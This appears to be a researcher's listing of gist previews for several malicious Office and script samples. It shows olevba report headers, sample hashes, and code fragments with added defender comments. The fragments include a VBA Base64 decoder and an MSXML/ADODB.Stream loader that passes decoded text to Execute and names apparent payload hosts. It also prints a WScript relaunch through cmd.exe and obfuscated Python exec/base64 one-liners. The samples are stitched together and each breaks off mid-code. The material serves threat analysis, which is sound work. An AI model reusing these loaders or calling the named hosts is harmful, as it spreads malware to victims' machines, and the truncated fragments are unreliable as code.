JohnLaTwC / VBA threat (PK)
Created September 24, 2018 00:02
VBA threat
## Uploaded by @JohnLaTwC
##############################################################################
## 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-H--- 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
===============================================================================
@JohnLaTwC
JohnLaTwC / update.windowsdefenderhost.com
Created September 26, 2018 23:29
update.windowsdefenderhost.com related threats
## Uploaded by @JohnLaTwC
## 5c8fc3b6118f88463f19d21c7f9526d45b40b26b83c74d4e148a6510aeb440de
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
## Uploaded by @JohnLaTwC
## e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
===============================================================================
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
## Uploaded by @JohnLaTwC
## Sample hash 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MAS-HB-- 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
===============================================================================
FILE: 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
Type: OpenXML
-------------------------------------------------------------------------------
## Uploaded by @JohnLaTwC
## Sample hash: ae986d7b6190876e4229bb1f3b8b3a99190eb89c360ce1e15efef3290afd1b7c
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
' Decode stage of the sample: places the base64 text `a` into an MSXML element typed as
' bin.base64 so that NodeTypedValue returns the decoded bytes, then passes those bytes to r()
' to turn them into a string. The one-letter names are a minimisation/obfuscation habit, not a
' functional requirement.
' Defender note: this helper exists only to feed the `Execute l("...")` call that follows, so a
' script that instantiates Msxml2.DOMDocument together with ADODB.Stream and then calls Execute
' is the behaviour worth alerting on; the decoded content is never written to disk.
Function l(a): With CreateObject("Msxml2.DOMDocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): End With: End Function
' Byte-array-to-text conversion used by l(): writes `b` into an ADODB.Stream opened in binary
' mode (Type = 1), rewinds to position 0, switches the same stream to text mode (Type = 2) with
' the utf-8 charset and reads the text back, closing the stream afterwards.
' Defender note: together with l() this is a complete base64 -> string decoder; because the
' result goes straight into Execute, the real script body is only observable at the point the
' Execute argument is evaluated (script-content logging), not on disk.
Function r(b): With CreateObject("ADODB.Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: End With: End function
Execute l("Dim urla
urla = "https://www.alwatanvoice.com/arabic/news/2018/10/08/1180543.html"
Host1 = "http://just4shared.com"
Host2 = "http://akamailshare.com"
Folder = "" '"vb/"
xurl = "1180543"
## Uploaded by @JohnLaTwC
## Sample hash: fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
On Error Resume Next
Dim objShell : Set objShell = CreateObject("WScript.Shell")
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
For Each vArg In WScript.Arguments
sArgs = sArgs & " """ & vArg & """"
Next
objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit")
## Uploaded by @JohnLaTwC
## Sample Hash: f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("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
## Uploaded by @JohnLaTwC
## Sample Hash: f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("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
## Uploaded by @JohnLaTwC
## Sample hash: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
===============================================================================
FILE: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
Type: OLE